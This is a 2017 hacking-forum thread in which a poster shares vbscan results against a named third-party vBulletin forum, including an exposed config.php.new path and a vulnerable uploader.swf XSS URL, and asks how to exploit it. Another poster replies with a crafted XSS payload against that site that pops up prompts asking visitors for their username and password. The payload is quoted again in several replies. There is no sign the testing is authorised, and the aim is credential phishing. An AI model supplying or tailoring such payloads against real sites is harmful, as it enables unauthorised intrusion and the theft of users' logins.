
Help with XSS

by Gonz0 - 11-14-2017 - 06:09 PM
#1
Hello, so I am trying to learn how to XSS and I scanned a site with vbscan on Kali and it turns out the forum is XSS; here are the scan results:


Code:
[+] Detecting Vbulletin based Firewall
[++] No known firewall detected

[+] Detecting vBulletin Version
[++] vBulletin 4.2.5


[+] Core Vbulletin Vulnerability
[++] Target vbulletin core is not vulnerable

[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] Checking admincp/modcp path
[++] admincp Found
https://deathwishx.com/forumv2//admincp
[++] modcp Found
https://deathwishx.com/forumv2//modcp

[+] Checking validator.php
[++] validator.php is not found

[+] Checking robots.txt existing
[++] robots.txt is not found

[+] Checking c99 xml shell in admincp/subscriptions.php
[++] c99 xml shell is Not Found

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking config.php.x for disclure config file
[++] Readable config file is found
config file path : https://deathwishx.com/forumv2//includes/config.php.new


[+] Checking faq.php RCE backdoor
[++] Remote Code Execute backdoor not found

[+] Checking vBSEO 3.x - LFI (Local File Inclusion) vulnerability
[++] vbseo.php LFI is not vulnerable

[+] Checking vBulletin vBExperience 3 'sortorder' Parameter Cross Site Scripting Vulnerability
[++] xperience.php not vulnerable

[+] Checking arcade.php SQLI Vulnerability
[++] arcade.php not found

[+] Checking vBulletin YUI 2.9.0 XSS
[++] uploader.swf is vulnerable
https://deathwishx.com/forumv2//clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert(/XSS/);}//
POC : https://packetstormsecurity.com/files/124746/vBulletin-YUI-2.9.0-Cross-Site-Scripting.html

[+] Checking for html tags status
[++] HTML tag are Disable

[+] Checking Vbulletin 5.x - Remote Code Execution Exploit
[++] decodeArguments is not vulnerable


Was hoping someone could help me in learning what to do to exploit this.

Thanks.
#2
were you scanning this forum?
#3
(12-24-2017 - 05:12 AM)beta Wrote: were you scanning this forum?

if you read the scan results. it says deathwish.. not demon forums.
#4
(12-25-2017 - 02:42 AM)Gonz0 Wrote:
(12-24-2017 - 05:12 AM)beta Wrote: were you scanning this forum?

if you read the scan results. it says deathwish.. not demon forums.

If you look at the scan result, you can see that there is a vulnerable link:
https://deathwishx.com/forumv2//clientsc...owedDomain=\"})))}catch(e){alert(/XSS/);}//
One simple thing you can do to exploit this XSS vuln is phish on the site... For example:
deathwishx.com/forum2//clientscript/yui/uploader/assets/uploader.swf?<script>prompt('Username', ' '); prompt('Password', ' ')</script>
#5
(12-25-2017 - 09:41 PM)beta Wrote:
(12-25-2017 - 02:42 AM)Gonz0 Wrote:
(12-24-2017 - 05:12 AM)beta Wrote: were you scanning this forum?

if you read the scan results. it says deathwish.. not demon forums.

If you look at the scan result, you can see that there is a vulnerable link:
https://deathwishx.com/forumv2//clientsc...owedDomain=\"})))}catch(e){alert(/XSS/);}//
One simple thing you can do to exploit this XSS vuln is phish on the site... For example:
deathwishx.com/forum2//clientscript/yui/uploader/assets/uploader.swf?<script>prompt('Username', ' '); prompt('Password', ' ')</script>

ah thank you for your help.
#6
(12-25-2017 - 09:41 PM)beta Wrote:
(12-25-2017 - 02:42 AM)Gonz0 Wrote:
(12-24-2017 - 05:12 AM)beta Wrote: were you scanning this forum?

if you read the scan results. it says deathwish.. not demon forums.

If you look at the scan result, you can see that there is a vulnerable link:
https://deathwishx.com/forumv2//clientsc...owedDomain=\"})))}catch(e){alert(/XSS/);}//
One simple thing you can do to exploit this XSS vuln is phish on the site... For example:
deathwishx.com/forum2//clientscript/yui/uploader/assets/uploader.swf?<script>prompt('Username', ' '); prompt('Password', ' ')</script>

Did you copy/paste this from somewhere? Lol.... unless you changed text format etc Cheese
#7
(12-27-2017 - 11:25 PM)CaptainModz Wrote:
(12-25-2017 - 09:41 PM)beta Wrote:
(12-25-2017 - 02:42 AM)Gonz0 Wrote:
(12-24-2017 - 05:12 AM)beta Wrote: were you scanning this forum?

if you read the scan results. it says deathwish.. not demon forums.

If you look at the scan result, you can see that there is a vulnerable link:
https://deathwishx.com/forumv2//clientsc...owedDomain=\"})))}catch(e){alert(/XSS/);}//
One simple thing you can do to exploit this XSS vuln is phish on the site... For example:
deathwishx.com/forum2//clientscript/yui/uploader/assets/uploader.swf?<script>prompt('Username', ' '); prompt('Password', ' ')</script>
Did you copy/paste this from somewhere? Lol.... unless you changed text format etc  Cheese

I was wondering that myself. haha
#8
(12-28-2017 - 02:14 AM)Gonz0 Wrote:
(12-27-2017 - 11:25 PM)CaptainModz Wrote:
(12-25-2017 - 09:41 PM)beta Wrote:
(12-25-2017 - 02:42 AM)Gonz0 Wrote:
(12-24-2017 - 05:12 AM)beta Wrote: were you scanning this forum?

if you read the scan results. it says deathwish.. not demon forums.

If you look at the scan result, you can see that there is a vulnerable link:
https://deathwishx.com/forumv2//clientsc...owedDomain=\"})))}catch(e){alert(/XSS/);}//
One simple thing you can do to exploit this XSS vuln is phish on the site... For example:
deathwishx.com/forum2//clientscript/yui/uploader/assets/uploader.swf?<script>prompt('Username', ' '); prompt('Password', ' ')</script>
Did you copy/paste this from somewhere? Lol.... unless you changed text format etc  Cheese

I was wondering that myself. haha

Aye.. where the hell is my Christmas tree award??  Upside_down Upside_down
#9
(12-28-2017 - 02:19 AM)CaptainModz Wrote:
(12-28-2017 - 02:14 AM)Gonz0 Wrote:
(12-27-2017 - 11:25 PM)CaptainModz Wrote:
(12-25-2017 - 09:41 PM)beta Wrote:
(12-25-2017 - 02:42 AM)Gonz0 Wrote: if you read the scan results. it says deathwish.. not demon forums.

If you look at the scan result, you can see that there is a vulnerable link:
https://deathwishx.com/forumv2//clientsc...owedDomain=\"})))}catch(e){alert(/XSS/);}//
One simple thing you can do to exploit this XSS vuln is phish on the site... For example:
deathwishx.com/forum2//clientscript/yui/uploader/assets/uploader.swf?<script>prompt('Username', ' '); prompt('Password', ' ')</script>
Did you copy/paste this from somewhere? Lol.... unless you changed text format etc  Cheese

I was wondering that myself. haha

Aye.. where the hell is my Christmas tree award??  Upside_down Upside_down

That's a good question  Wink
#10
(12-27-2017 - 11:25 PM)CaptainModz Wrote:
(12-25-2017 - 09:41 PM)beta Wrote:
(12-25-2017 - 02:42 AM)Gonz0 Wrote:
(12-24-2017 - 05:12 AM)beta Wrote: were you scanning this forum?

if you read the scan results. it says deathwish.. not demon forums.

If you look at the scan result, you can see that there is a vulnerable link:
https://deathwishx.com/forumv2//clientsc...owedDomain=\"})))}catch(e){alert(/XSS/);}//
One simple thing you can do to exploit this XSS vuln is phish on the site... For example:
deathwishx.com/forum2//clientscript/yui/uploader/assets/uploader.swf?<script>prompt('Username', ' '); prompt('Password', ' ')</script>
Did you copy/paste this from somewhere? Lol.... unless you changed text format etc  Cheese

No, what makes you think that? Phishing with XSS is like the simplest thing you can do other than making a pop-up...